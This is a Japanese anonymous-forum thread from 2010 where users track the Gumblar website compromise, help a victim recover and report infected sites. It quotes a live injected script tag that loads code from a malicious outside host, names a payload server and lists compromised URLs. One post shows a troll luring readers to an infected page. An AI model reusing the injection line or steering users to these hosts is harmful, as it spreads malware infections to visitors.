また同一ネットワーク上にPCがあるならそちらもスキャンしてください
レンタルサーバでもFTPならパスがあるはずだけどそのへんはわかりません
ちなみに以下は意味がないです
> あわせて、>>658をみて、siszyd32.exeとTMD.tmpがないことを確かめました。
0705名無しさん@お腹いっぱい。
2010/05/13(木) 07:22:15rollover.jsにスクリプトを確認
欠けているのでおそらく不発ですが、放置するのもまずいですね…
0706名無しさん@お腹いっぱい。
2010/05/13(木) 08:33:19パスがないって…anonymousなの?
0707名無しさん@お腹いっぱい。
2010/05/13(木) 08:52:380708名無しさん@お腹いっぱい。
2010/05/13(木) 09:03:39マルウェア専用のダウンローダーが入ってればそんな事しても意味無い
>FTPはレンタルサーバーのものを使っているのでパスはありません。
意味がわかりません
0709コテハン ◆8080adndqg
2010/05/13(木) 10:58:53■感染パソコンの修復は「OSの再インストール」が近道
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2166
スキャナー走らせまくって「不確実な駆除作業」に時間をかけるより
クリーンインストールのほうが早くて確実なのです。
0710名無しさん@お腹いっぱい。
2010/05/13(木) 12:00:37>>2は感染する前にやらないと無意味
0711名無しさん@お腹いっぱい。
2010/05/13(木) 12:12:07みなさん、ありがとうございます。
ウイルス駆除ソフトで、検知されなかったのでもう大丈夫だと思っていました。
OSの再インストールというのをやったことがないので不安ですが、リカバリディスクは
PCを購入した時に
解説書にあるとおりに「工場出荷時のイメージ」として作ったCDのことだと思いますので、
それで復元できると思います。
やってみます。
0712名無しさん@お腹いっぱい。
2010/05/13(木) 12:50:07出来ないとしたらPCが物理的に壊れてる
0713名無しさん@お腹いっぱい。
2010/05/13(木) 13:02:10以下の鶴で検査して異常がなければ無問題だよ。
リカバリする前に試してみ。
オンラインウイルススキャン
http://www.kaspersky.co.jp/virusscanner
ウイルス駆除ツール
http://support.kaspersky.co.jp/viruses/utility
KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
0714コテハン ◆8080adndqg
2010/05/13(木) 13:28:52サイトに突っ込まれたのはどのタイプかにゃ?
1:<script src=http://〜中略〜.php ></script>
2:<script>〜難読化されたコード〜</script><!--英数字の羅列(32文字)-->
3:1・2以外のコード
4:よくわかんない
0715名無しさん@お腹いっぱい
2010/05/13(木) 13:42:44ありがとうございます。やってみます。
>714
1だと思います。
短めのもので、一ページに一行だけ挿入されていました。
ページの削除→再アップロードで消えました。
0716名無しさん@お腹いっぱい。
2010/05/13(木) 13:46:09Shockwaveなんて今時使わないだろ
やっぱり要らないプラグイン入ってる奴はアンインストールしとけ
0717名無しさん@お腹いっぱい
2010/05/13(木) 13:57:09>>714
頻出してすいません。さがしてきました。これです。
<script src=http://science.webphoto.ir/photos/Advertise.php
></script>
0718名無しさん@お腹いっぱい。
2010/05/13(木) 14:07:08>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
http://www.google.com/safebrowsing/diagnostic?site=%73%63%69%65%6e%63%65%2e%77%65%62%70%68%6f%74%6f%2e%69%72
http://safeweb.norton.com/report/show?url=%77%65%62%70%68%6f%74%6f%2e%69%72
http://www.siteadvisor.com/sites/%77%65%62%70%68%6f%74%6f%2e%69%72
0719名無しさん@お腹いっぱい。
2010/05/13(木) 14:25:29その調べたサイトが安全でも「同一サーバ上の他のウェブサイト」がひとつでも感染してると
調べたサイトも危険ということになるのか?
0720コテハン ◆8080adndqg
2010/05/13(木) 14:40:16そりはGumblar(Gumblar.x)だぬ。
>>713でもおkだけど、他の物も入り込んでる可能性が高いから、
リカバリ後に>>2を実行を推奨するのです。
0721名無しさん@お腹いっぱい。
2010/05/13(木) 14:41:11日本語でおk
0722名無しさん@お腹いっぱい。
2010/05/13(木) 15:01:50試しに踏んでみたけど何の反応もない。
0723名無しさん@お腹いっぱい
2010/05/13(木) 16:09:12spybot,ccc,>>713の方法で二回スキャンをかけました。
結果はゼロでウイルスは見つかりませんでしたが
念のためにリカバリしようと思います。
詳しい方が多いようなのでもう一つだけお願いします。
windows7を使っています。
outlookのメールをファイルに保存して、ファイルを外部CDへコピーし、
リカバリの後に戻そうと思っています。
その方法がOEと違っていて、参考になるサイトが見つかりません。
(Xp→7の方法や、OEのファイル保存方法がひっかかります)
windows liveで同期をとろうとしましたが、こちらも再インストールしても、うまくいきませんでした。
スレチなのでお叱り承知ですが、win7のメールの再生方法について、ご教授お願いいたします。
あと>>722さん踏ませてしまってごめんなさい。以後気をつけます。
0724名無しさん@お腹いっぱい。
2010/05/13(木) 16:14:200725名無しさん@お腹いっぱい。
2010/05/13(木) 16:16:12http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=8b081f3a-b7d0-4b16-b8af-5a6322f4fd01
http://www.atmarkit.co.jp/fwin2k/win2ktips/405pstbkup/pstbkup.html
0726名無しさん@お腹いっぱい。
2010/05/13(木) 16:16:25> windows7を使っています。
なら感染してないよ、たぶん。
0727名無しさん@お腹いっぱい。
2010/05/13(木) 16:27:30www●caaac●net
www●ykhsk●net
www●delldell●info
www●nkrc●co●jp
www●nihontouya●com
0728名無しさん@お腹いっぱい。
2010/05/13(木) 17:55:03>バージョンアップ内容
> * (2010/05/13) 右クリックメニューからaguse / aguse Gatewayを利用するツールを公開しました。(Firefox3, IE8)
0729コテハン ◆8080adndqg
2010/05/13(木) 18:05:21〜\x2e\x70\x68\x70" 復活してたのねorz
【陥落サイトのURL悪用厳禁】
www●uranaiyakata●com/
lecoqsportif-jp●com/
www●tec●ne●jp/
ja-jp●facebook●com/ ←ぁ?
0730名無しさん@お腹いっぱい。
2010/05/13(木) 18:05:29先進国はやられてほしくないものだが
0731名無しさん@お腹いっぱい。
2010/05/13(木) 18:52:370732名無しさん@お腹いっぱい。
2010/05/13(木) 18:53:20↓
○ccTLD
0733名無しさん@お腹いっぱい。
2010/05/13(木) 18:53:43ttp://www.honeywhales.com/
使い方の問題かもしれんが
0734名無しさん@お腹いっぱい。
2010/05/13(木) 20:11:28心当たりがある奴はうpデートしといたほうがいい。
入れたの忘れてる可能性あるし、うpデートしにいけば、入ってるかどうかわかるし。
0735名無しさん@お腹いっぱい。
2010/05/13(木) 20:24:25ただ常駐しているわけではなくShockwave踏んだ時にチェックが走る模様。
0737名無しさん@お腹いっぱい。
2010/05/13(木) 20:34:53勝手に作品とかアップロードされる?
あとOutlookやGMailに迷惑メールもいっぱい来るのだろうか
0738名無しさん@お腹いっぱい。
2010/05/13(木) 20:49:38アップロードはない
そういうものじゃない
スパムメールについてはあるかもしれない
0739名無しさん@お腹いっぱい。
2010/05/13(木) 20:57:11PC初心者さんはサイト運営とかやらんほうがいいよ
http://pc11.2ch.net/test/read.cgi/pcqa/1273597538/68
0740名無しさん@お腹いっぱい。
2010/05/13(木) 20:59:28HP運営してないPCだとFTPじゃなくてサイトとかのID・PW抜かれるのかと思った
ISPからの個人あてメール(請求額等)は削除した方がいいな・・・
0741名無しさん@お腹いっぱい。
2010/05/13(木) 21:06:27ネットワーク上の盗聴はしてるからそういうものは抜かれるよ
下の行についてはどういう意味でそれをするのかよくわからないけどお好みでどうぞ
0742名無しさん@お腹いっぱい。
2010/05/14(金) 07:02:29WordPressとかJoomlaとかそういうCMS使ってる?
それなら>>717は多分
http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html
とか
http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-holasionweb-on-go-daddy/
そんな感じじゃないかな。
多分本人のPCに問題は無いと思う。多分だけど。
0743名無しさん@お腹いっぱい。
2010/05/14(金) 07:38:25このサイト、覗くとウイルスに感染するサイトですかね?
確認できる人おねがいします・・・
怖いのでURLの頭2つ消してます。
覗いてから、タスクマネージャが常に100%になって重すぎ状態に・・
0744名無しさん@お腹いっぱい。
2010/05/14(金) 07:44:160745名無しさん@お腹いっぱい。
2010/05/14(金) 07:44:44死ね
0746名無しさん@お腹いっぱい。
2010/05/14(金) 09:08:21チェッカーサイトももっと改ざんを検出してくれるような有用なものが
もう2つか3つくらい出来てもいいのにと思う
そうすれば陥落サイトをここで警告できるのだが
0747名無しさん@お腹いっぱい。
2010/05/14(金) 09:34:11あと専ブラによってはtp://でもURLリンクします
危険URLは.を●にしましょう
総括:PC窓から投げ捨てて氏ね
0748名無しさん@お腹いっぱい。
2010/05/14(金) 11:23:160749名無しさん@お腹いっぱい。
2010/05/14(金) 11:26:02不思議で不思議でしょうがない
0750名無しさん@お腹いっぱい。
2010/05/14(金) 11:33:08本当につまらないんだよ
0751名無しさん@お腹いっぱい。
2010/05/14(金) 12:57:52http://pc12.2ch.net/test/read.cgi/win/1268733271
ここによればホームサーバのウィルス対策は個人の自由だそーな
0752名無しさん@お腹いっぱい。
2010/05/14(金) 13:31:53そう思うなら作ればいいじゃない
0753名無しさん@お腹いっぱい。
2010/05/14(金) 13:32:28だね・・・。
>>723は鵜呑みにしてリカバリしてしまったんだろうな(‐人‐)
0754名無しさん@お腹いっぱい。
2010/05/14(金) 13:48:420755コテハン ◆8080adndqg
2010/05/14(金) 14:52:48www●netshikoku●com/n-sekisho/ ←絶賛放置中
※fuukei/niitaka/index.htmとか・・・
www●seibidou●jp/products/information_sign/index●html ←ここも絶賛放置中
途中で切れてるけど・・・いちおう
www●contiforce●com/
fourlcp●com/
0756名無しさん@お腹いっぱい。
2010/05/14(金) 17:22:47www●hipparidako●net
0757名無しさん@お腹いっぱい。
2010/05/14(金) 18:19:58ソフトウェアを実行できるようにしますか」と聞いてくるのですが
>>2に従い(1)〜(4)の設定をしてからのように思うのです
ある画面では7回位連続して確認を取りにきます
これをしなくていいようにするにはどうすればいいのでしょうか
皆さん頻繁にOKのクリックをしておられるのですか?
0758名無しさん@お腹いっぱい。
2010/05/14(金) 18:41:550759名無しさん@お腹いっぱい。
2010/05/14(金) 18:47:43二日前にメル凸した方が居る様で
対応済みとたこが言っていました
んだがしかし、rollover.js
ttp://www.virustotal.com/jp/analisis/a46c3abee48dcffe1caa821d705822031c35fe5d97ddd61ca6fcaf40848bde10-1273829143
ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.hipparidako.net%2Findex.html&x=34&y=26
[Gumblarの可能性あり]
0760名無しさん@お腹いっぱい。
2010/05/14(金) 19:34:04Dr.WEBも赤く怒ってました
0761コテハン ◆8080adndqg
2010/05/14(金) 19:58:54rollover●js
function M(){var・・・
↓
passportblues●ru:8080
0762名無しさん@お腹いっぱい。
2010/05/14(金) 20:15:38>>2は関係ありません
0763名無しさん@お腹いっぱい。
2010/05/14(金) 20:26:04そうなんですか…
ありがとうございます
0764名無しさん@お腹いっぱい。
2010/05/15(土) 01:38:27mysta-hair●com/premium/premium_list/
0765名無しさん@お腹いっぱい。
2010/05/15(土) 02:51:290766名無しさん@お腹いっぱい。
2010/05/15(土) 03:33:310767名無しさん@お腹いっぱい。
2010/05/15(土) 06:09:420768名無しさん@お腹いっぱい。
2010/05/15(土) 10:03:31またやられたのか。
しかも.htaccessのreplaceの設定が適当なのか、オードリーのページに直接行こうとするとアドレスがイミフなことに。
こんな素人以下のカスweb会社ってあるんだなぁ。
0769名無しさん@お腹いっぱい。
2010/05/15(土) 11:11:27mysta-hair●com/premium/premium_list/も
会社概要にはホームページ作成とある件
0770名無しさん@お腹いっぱい。
2010/05/15(土) 12:19:040771名無しさん@お腹いっぱい。
2010/05/15(土) 14:07:11www●netshikoku●com/n-sekisho/
www●brand89●com
www●ryu1●co●jp
www●tenkou1●net
0772名無しさん@お腹いっぱい。
2010/05/15(土) 18:04:00スクショ系暴露ウイルスの怖さを認識したのが最近、Gumblarなんてその怖さを始めは理解できず、サイトもってないしあんま関係ないわ、こんな感じだった
やってたことと言えばOSのアプデとFirefox+NoscriptでJavaスクリプト切ってたくらい
が、サイトによっては結構ONにしてきたし
アドオンの方は更新頻度もテキトーだったし、AdobeリーダーなんてJavaスクリプトONで使いまくってたし、
今いろいろな設定して使ってることから考えると怖い、感染してないのが不思議だね
感染してないとは思うけどな
0773名無しさん@お腹いっぱい。
2010/05/15(土) 18:31:05>感染してないとは思うけどな
>_<
0774名無しさん@お腹いっぱい。
2010/05/15(土) 18:35:43www●arktake●co●jp
www●g-himiko●co●jp
0775名無しさん@お腹いっぱい。
2010/05/15(土) 18:47:10www●g-himiko●co●jp
www●arktake●co●jp
www●acl-music●jp
0776名無しさん@お腹いっぱい。
2010/05/15(土) 18:48:250777名無しさん@お腹いっぱい。
2010/05/15(土) 18:52:34>< ぺけぽこ
0778名無しさん@お腹いっぱい。
2010/05/15(土) 18:56:32i-walker●jp
anime●len2●net
0779名無しさん@お腹いっぱい。
2010/05/15(土) 19:45:08majideそう思うわけ?
きちんと調べるわ
0780名無しさん@お腹いっぱい。
2010/05/15(土) 19:48:36暴露ウィルスはおそらく作者日本人のいたずら
Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
クレジットカードや銀行口座の情報を盗む
ウィルス作者の作成の手腕も全然違うし
性質がそもそも違うので比較しても仕方が無い
0781名無しさん@お腹いっぱい。
2010/05/15(土) 19:49:47>Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
>クレジットカードや銀行口座の情報を盗む
>世界的な凶悪犯罪
0782名無しさん@お腹いっぱい。
2010/05/15(土) 20:26:28でもそれが目的じゃないから、口座やクレジット情報をPCで扱わない人は大丈夫って話?2次感染は防止しななきゃいかんけど
でももうそろそろウイルスの中身解析されたりで、転用がでてきたりするんだろうね
0783名無しさん@お腹いっぱい。
2010/05/15(土) 20:33:520784名無しさん@お腹いっぱい。
2010/05/15(土) 20:38:55 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
|
____.____ | .__
| | | | |\_\
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
0785名無しさん@お腹いっぱい。
2010/05/15(土) 20:45:520786名無しさん@お腹いっぱい。
2010/05/15(土) 20:54:42わかってない奴がいるのが訳わからん
0787名無しさん@お腹いっぱい。
2010/05/15(土) 22:08:05メールアカウントはスパム送信に利用されます
ブログアカウントもコメントスパムに利用したり
それぞれ需要はあるのです
0788名無しさん@お腹いっぱい。
2010/05/15(土) 23:18:31ここは、これからもWindowsを使っていく人が、ウイルスの怖さを正しく認識し運用して行くスレ。
わかってない奴がいるのが訳わからん
0789名無しさん@お腹いっぱい。
2010/05/15(土) 23:46:29これもガンブラーなの?
0790名無しさん@お腹いっぱい。
2010/05/15(土) 23:53:01>>775
0791名無しさん@お腹いっぱい。
2010/05/16(日) 13:29:13www●arktake●co●jp
www●acl-music●jp
メル凸しときました
株式会社アークテイクはjpnic★alpha-web.jp宛なので不安が残る…
0792名無しさん@お腹いっぱい。
2010/05/16(日) 14:54:04改ざん具合からしてだいぶ放置されてるようだから大元から止めないとダメだろう
JPCERT/CCにも送っておくわ
0793名無しさん@お腹いっぱい。
2010/05/16(日) 15:24:53ありがと
0794名無しさん@お腹いっぱい。
2010/05/16(日) 17:03:07www●njr●or●jp/m01/07/070405-2/ ←国土交通省関連の公益法人。
Topは改ざんされていないということは、修正漏れ?それにしても公表もしていないとは。。
www●spa-marufuku●com(FRAMEリンク先 park21●wakwak●com/~marufuku/ が感染)
www●3ku●jp
www●isshu●jp/001/470/ ←Topだけ直した?配下は改ざんされたまま
www●ryo-co●net
1excellent●com
楽天市場ショップの制作から運営代行まできめ細かくサポート ホームページ制作のエクセレント
って、またここが製作したページも感染しているのか。。
フォームからも送れないし。
0795名無しさん@お腹いっぱい。
2010/05/16(日) 20:01:13公開連絡窓口のアドレスが死んでたのでカイクリエイツ宛て
メールフォームあるけどaguseGWなしで感染サイトに突撃する勇気は…
【悪用厳禁】
www●marbell●jp
www●any-news●biz :「自己防衛することも重要な世の中ですね」…重要だねorz
0796名無しさん@お腹いっぱい。
2010/05/16(日) 20:23:59確認できないんだけど
0797名無しさん@お腹いっぱい。
2010/05/16(日) 20:27:52gredで覗いてみて
0798名無しさん@お腹いっぱい。
2010/05/16(日) 22:06:28改竄コードの見本市のようだw
0799コテハン ◆8080adndqg
2010/05/17(月) 10:40:29www●children-nepal●net/suryamukhi/handpuppets-j/woodenheadhandpuppets/home●htm
www●3ku●jp/grow_images/2005/june/index_2005june●html ←途中切れ
www●k3●dion●ne●jp/~sym1909 ←途中切れ
www●arktake●co●jp/
www●ryo-co●net/index●html
www●njr●or●jp/m01/07/070706/index●html ←←←
1excellent●com ←←←←ホームページ制作のエクセレント
0800名無しさん@お腹いっぱい。
2010/05/17(月) 11:41:02> 「wwwzuc32.exe」というキーワードでググってみたら、ここ最近
> (先週から?)の「Gumblar.8080」の改ざん攻撃を受けたページの閲覧で
> 発動・感染することになるファイル名のようですな。
へぇー。
0801名無しさん@お腹いっぱい。
2010/05/17(月) 13:00:34> www●k3●dion●ne●jp/~sym1909
・hpbmapscript3.js
http://a001.aguse.jp/images/img/f090685f279c3951cc957f1b963f131250fd6337/555cb0a560a66b7757cd109970789d1ced2d8f64_00_x.jpg
メル凸しときました
【悪用厳禁】
www●kokushiad●jp :Gumblarが入学したようですorz
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.kokushiad.jp
0802名無しさん@お腹いっぱい。
2010/05/17(月) 13:17:16…じゃあここは何?
0803名無しさん@お腹いっぱい。
2010/05/17(月) 13:30:33受験生向けっぽい
0804名無しさん@お腹いっぱい。
2010/05/17(月) 13:31:15入学課だった
0805名無しさん@お腹いっぱい。
2010/05/17(月) 13:37:46www●fuchucci●or●jp
府中商工会議所
0806名無しさん@お腹いっぱい。
2010/05/17(月) 14:07:16ありがと、URL分けてるのね
そういうことならJPCERTにも報告しておきます
>>805
メールで凸っときました
0807名無しさん@お腹いっぱい。
2010/05/17(月) 17:20:27一般ユーザーは自動更新ガン無視、未だにIEは6。
web屋はアップデートすると業務に支障きたすとか言ってノーガード。
0808名無しさん@お腹いっぱい。
2010/05/17(月) 19:53:46>世界ブラウザ市場で、IE6は17.58%のシェアを持ち、2位に付けている
何も日本に限ったことではなさそうな…って2位かよ
0809名無しさん@お腹いっぱい。
2010/05/17(月) 20:28:210810名無しさん@お腹いっぱい。
2010/05/17(月) 20:47:452000とかMeとか→IE6で終わり
XPとかVistaとか→IE8にできる
0811名無しさん@お腹いっぱい。
2010/05/17(月) 21:00:03そうでもないぞ
低スペックPCではIE7の方が8より軽い
0812名無しさん@お腹いっぱい。
2010/05/17(月) 21:24:200813名無しさん@お腹いっぱい。
2010/05/17(月) 21:39:180814名無しさん@お腹いっぱい。
2010/05/17(月) 21:43:290815名無しさん@お腹いっぱい。
2010/05/17(月) 21:54:41ActiveX使いまくりで、Firefox、Chrome等当然未対応
AD環境だったから、導入時にいちいちAdministrators権限持ちのユーザで
モジュール毎にActiveX入れて回らなければならないとか糞だった
しかも、よくわかってないのか
「スクリプトを実行しても安全だとマークされていないActiveX〜〜」にチェックつけろとか
インストール手順書が回ってくるし
こういう連中がGumblar流行の助長してるんだろうな
0816名無しさん@お腹いっぱい。
2010/05/17(月) 22:42:490817名無しさん@お腹いっぱい。
2010/05/17(月) 23:46:290818名無しさん@お腹いっぱい。
2010/05/18(火) 00:02:080819名無しさん@お腹いっぱい。
2010/05/18(火) 01:08:16もちろんIE6はそのグループウェア専用にしてるんだよね?
普段はFirefoxxやOperaでYahooとか見てるんだよね?
0820名無しさん@お腹いっぱい。
2010/05/18(火) 01:14:490821名無しさん@お腹いっぱい。
2010/05/18(火) 01:50:27ttp://blog.livedoor.jp/blackwingcat/
0822名無しさん@お腹いっぱい。
2010/05/18(火) 13:37:37何を残すとか何を削るとか毎度揉めてるみたいだけど
0823名無しさん@お腹いっぱい。
2010/05/18(火) 13:52:150824名無しさん@お腹いっぱい。
2010/05/18(火) 14:27:57ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2211
ここのとかまるまるコピペで加えるだけでいいんじゃないかな。
0825名無しさん@お腹いっぱい。
2010/05/18(火) 14:46:17ケイダッシュのホスティングしてる大塚商会も問題有りだな。
気休めにこれぐらいしてやったらいいのに。
<Limit ALL>
Order Allow,Deny
Allow from alpha-prm.jp
Deny from all
</Limit>
0826名無しさん@お腹いっぱい。
2010/05/18(火) 16:32:01www●hamonoichiba●com
金券ショップも注意
www●access-ticket●com
改ざんされてる通販サイトは廃業しろよ…
0827名無しさん@お腹いっぱい。
2010/05/18(火) 17:59:530828名無しさん@お腹いっぱい。
2010/05/18(火) 18:13:27ttp://twitter●com/access_kun
@2ちゃんって何?
ネラーなの?
0829名無しさん@お腹いっぱい。
2010/05/18(火) 19:11:39このクズにサイトがウイルスばらまいてるって教えてやれよ
0830名無しさん@お腹いっぱい。
2010/05/18(火) 19:23:27確認出来ない
0831名無しさん@お腹いっぱい。
2010/05/18(火) 19:29:26地方自治体、政府関係あたりは特に
WindowsUpdateの警告出すな
ウィルス対策ソフトの警告出すな
Adobe ReaderやFlash、JREが勝手にアップデートして
システムが動かなくなったらどうするんだ
自動アップデート切れとか言ってくる
自治体や政府こそ危ない
これが日本政府の現実
0832名無しさん@お腹いっぱい。
2010/05/18(火) 19:29:33Gumblar/8080 Not Found.
おい。
0833名無しさん@お腹いっぱい。
2010/05/18(火) 19:48:59http://tsushima.2ch.net/test/read.cgi/news/1273995935/168-182
0834名無しさん@お腹いっぱい。
2010/05/18(火) 19:49:41修正されたようだな
17:44の時点ではJSの中にあった
0835名無しさん@お腹いっぱい。
2010/05/18(火) 20:08:43www●hamonoichiba●com
確認の後電凸完了
www●access-ticket●com
確認の後電凸完了
ここは、別の方が12時頃に電凸があったと言っていた
サーバー会社とHP作成会社に調査依頼をかけた結果が
たた今届き、15日に改竄があったとのこと
0836名無しさん@お腹いっぱい。
2010/05/18(火) 20:25:32電凸乙
0837名無しさん@お腹いっぱい。
2010/05/18(火) 20:27:29てっぺんからしてこんなんだから
そりゃ自衛隊の情報流出も起きるわ
嗚呼F-22配備の夢……
0838名無しさん@お腹いっぱい。
2010/05/18(火) 20:30:00それは別の問題だろ
0839名無しさん@お腹いっぱい。
2010/05/18(火) 20:46:460840名無しさん@お腹いっぱい。
2010/05/18(火) 21:13:23www●crossmarin●net :またWEB屋かorz
0841名無しさん@お腹いっぱい。
2010/05/18(火) 21:51:36電凸完了
こんな時間に電話をかけてくるのは失礼でしょう、だとw
だがしかし、伝える事はつたえた
理解したかは知らん
サーバー会社と私が悪者らしいw
アホや
0842名無しさん@お腹いっぱい。
2010/05/18(火) 22:07:28お疲れ様でした
メンテに変わりました
0843名無しさん@お腹いっぱい。
2010/05/18(火) 22:31:55www●nas-server●info/
ここも感染してる?
0844名無しさん@お腹いっぱい。
2010/05/18(火) 22:37:08してる
0845名無しさん@お腹いっぱい。
2010/05/18(火) 22:44:36サンクス
モロゾフ以来に久しぶりに踏んだよ
0846名無しさん@お腹いっぱい。
2010/05/18(火) 22:45:31検索しても英語ばかりで詳細分からなかった
0847名無しさん@お腹いっぱい。
2010/05/18(火) 22:47:16ttp://www.virustotal.com/jp/analisis/fff384343e645c279bd61ae9fc89fcdae27dc02e79ffeb3db86deefa3a2c8a59-1274190254
ttp://www.aguse.jp/?m=w&url=www.nas-server.info%2F&x=24&y=17
[Gumblarの可能性あり]
0848名無しさん@お腹いっぱい。
2010/05/18(火) 23:05:12高みのけんぶつだわ
0849名無しさん@お腹いっぱい。
2010/05/18(火) 23:05:57み つ か ら な い o r z
0850名無しさん@お腹いっぱい。
2010/05/18(火) 23:28:34ここは鑑定スレじゃない事を忘れずに
>>848
誰がうまいこと言えと
0851コテハン ◆8080adndqg
2010/05/18(火) 23:32:58www●ryu1●co●jp/
www●ftagent●jp ←傑作w
↓
><p>現在、本サイトはメンテナンスを行っております</p>
><p>改めてアクセスをお願いいたします </p>
<script>KO={x:false};this.RO=・・・
www●any-news●biz/ ←Web・インターネット・SEO系ニュース
0852名無しさん@お腹いっぱい。
2010/05/18(火) 23:38:09(略).info/info/2010/05/post_2.php
>パソコンが不調です。
>私のもいまいち動きが鈍いですが、同僚さんのPCがついに壊れてしまいました。
>うんともすんとも言わない状況。
これはひょっとして笑うところか?
0854名無しさん@お腹いっぱい。
2010/05/18(火) 23:40:50→ www●crossmarin●net :found
→ temp●crossmarin●net :found
→ han●crossmarin●net :found
どうにもならねえやwww
0855名無しさん@お腹いっぱい。
2010/05/18(火) 23:42:45>PCがついに壊れてしまいました
windowsが起動しないだけってオチカ?
0856名無しさん@お腹いっぱい。
2010/05/18(火) 23:47:18申し訳ない、厭な思いをさせちゃったうえにこんな結果だったみたいだ…
0857815
2010/05/19(水) 00:23:34感染者発生wwww
あばばばば
>>819
おじさん連中はみんな、ブラウザ=IEと思ってるよ
俺は余裕でIE8ぶっこんだ
普通に動いたんだけどね
0858名無しさん@お腹いっぱい。
2010/05/19(水) 00:42:55Nのグループウエアって星の事務所かな?
最新版は、IE8も桶だね。
でも簡単にバージョンアップできるものでもないけどね。
カスタマイズしてたら特にね。
0859名無しさん@お腹いっぱい。
2010/05/19(水) 00:45:58101 :名無しさん@ビンキー:2010/05/19(水) 00:25:11 0
>>96
ウナちゃんもこのままだと同じ末路になる
http://www.nas-server.info/
ひでぇと思ったwwwwwwwwwwwwwwww
189 :斎藤智成 ◆LIuJMgzRRY :2010/05/19(水) 00:43:51 0
そろそろネタ晴らし(てかさっきからしてるのに誰も気づかない馬鹿ばかりなので)
>>101は俺でした。そして最新の危険ウィルスだから検知できないよ。
嘘だと思ったらURLをぐぐってみろ
まーそんなわけでコンビニいく
帰ってきたら生放送するから
サイちゃんでタグ検索してね
0860858
2010/05/19(水) 00:48:28>自動アップデート切れとか言ってくる
うちの会社もアップデートきってる。
ユーザからソフトのインストール権限奪ってるし、Adminでは、プロキシ設定をわざとしていないから
自動アップデートが動いてもダウンロードできないから。
ちなみにIEは6。親会社のシステムがIE6でないといけないから。7と8はダメとなっているから。
0861名無しさん@お腹いっぱい。
2010/05/19(水) 00:50:450862名無しさん@お腹いっぱい。
2010/05/19(水) 00:51:05avast!対応はやっっ
0863名無しさん@お腹いっぱい。
2010/05/19(水) 08:03:48そこはここに出る前から対応してた(JS:Illredir-BU,5/14に対応)
昨日検知しなかった奴も検体送っといたら今日の分(JS:Illredir-BX,5/18の2本目)で対応してくれた
ありがたやありがたや
0864名無しさん@お腹いっぱい。
2010/05/19(水) 11:49:52MSはWindows8からは自動更新は強制アップデートしろ
でもってサポ切れOSはネット繋げなくなるようにしてしまえばいい
0865名無しさん@お腹いっぱい。
2010/05/19(水) 12:49:01大半の企業は8をパスして7のProかEnterpriseを2020年まで使うことになるだろう
0866名無しさん@お腹いっぱい。
2010/05/19(水) 13:03:48やっぱり向こうはちゃんと対策してて絶対安全くらいのレベルなのかな?
日本は公的機関も普通に陥落してるが
0867名無しさん@お腹いっぱい。
2010/05/19(水) 13:35:420868コテハン ◆8080adndqg
2010/05/19(水) 13:46:12maillady●hirotu●net/
suncs●sakura●ne●jp/ ←吹いたw
tengas155●coreserver●jp/
0869名無しさん@お腹いっぱい。
2010/05/19(水) 14:04:07OS云々より教育をしてないからだな
P2P使うバカも後を絶たないし
0870名無しさん@お腹いっぱい。
2010/05/19(水) 14:07:54?
0871名無しさん@お腹いっぱい。
2010/05/19(水) 14:18:100872名無しさん@お腹いっぱい。
2010/05/19(水) 15:41:300874名無しさん@お腹いっぱい。
2010/05/19(水) 20:48:14ttp://internet.watch.impress.co.jp/docs/news/20100519_367965.html
改竄チェッカー
ttp://www.at-link.ad.jp/service/option/security/falsification/
たけーよ
0875名無しさん@お腹いっぱい。
2010/05/19(水) 21:25:10diet-sango●jp/info/
tw13●net
0876名無しさん@お腹いっぱい。
2010/05/19(水) 21:54:540877名無しさん@お腹いっぱい。
2010/05/19(水) 22:04:460879名無しさん@お腹いっぱい。
2010/05/19(水) 22:36:12Cドライブフォルダやレジストリエディタの確認でも見当たらないのか 厄介だ
0880名無しさん@お腹いっぱい。
2010/05/19(水) 23:36:130881名無しさん@お腹いっぱい。
2010/05/20(木) 01:15:38レジストリでもデバイスドライバ関係のレジストリ読める人には確認できると思う
HKLM\Software\Microsoft\Windons\CurrentVersion\Run
だっけ?
今のはこんな所探しても見つからない
0882名無しさん@お腹いっぱい。
2010/05/20(木) 02:49:43こっちも確認しないと
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
0883名無しさん@お腹いっぱい。
2010/05/20(木) 03:30:24おとなしくスキャンしてください
0884(VдV) ◆yUyb3Tqn92
2010/05/20(木) 05:04:130885(VдV) ◆yUyb3Tqn92
2010/05/20(木) 05:05:060886名無しさん@お腹いっぱい。
2010/05/20(木) 05:10:49またお前が斎藤を嗾けたのか
0887名無しさん@お腹いっぱい。
2010/05/20(木) 07:54:510888名無しさん@お腹いっぱい。
2010/05/20(木) 08:34:21だからそんな所見てもしかたないって
0889名無しさん@お腹いっぱい。
2010/05/20(木) 08:34:57君がやってたウィルス配布BBS消えてたけど移転した?
検索しても出ないんだが
0890名無しさん@お腹いっぱい。
2010/05/20(木) 09:44:160891名無しさん@お腹いっぱい。
2010/05/20(木) 12:03:41誰も気にしないよネット弁慶とか
0892名無しさん@お腹いっぱい。
2010/05/20(木) 13:50:49ttp://aaabbbccc.s6.x-beat.com/upload/src/up33522.jpg
0893名無しさん@お腹いっぱい。
2010/05/20(木) 17:03:40ああ通報しちまおうぜ
つーか今まで捕まらなかったのが不思議なくらいだ
0894名無しさん@お腹いっぱい。
2010/05/20(木) 17:47:120895名無しさん@お腹いっぱい。
2010/05/20(木) 17:54:230896名無しさん@お腹いっぱい。
2010/05/20(木) 20:20:310897名無しさん@お腹いっぱい。
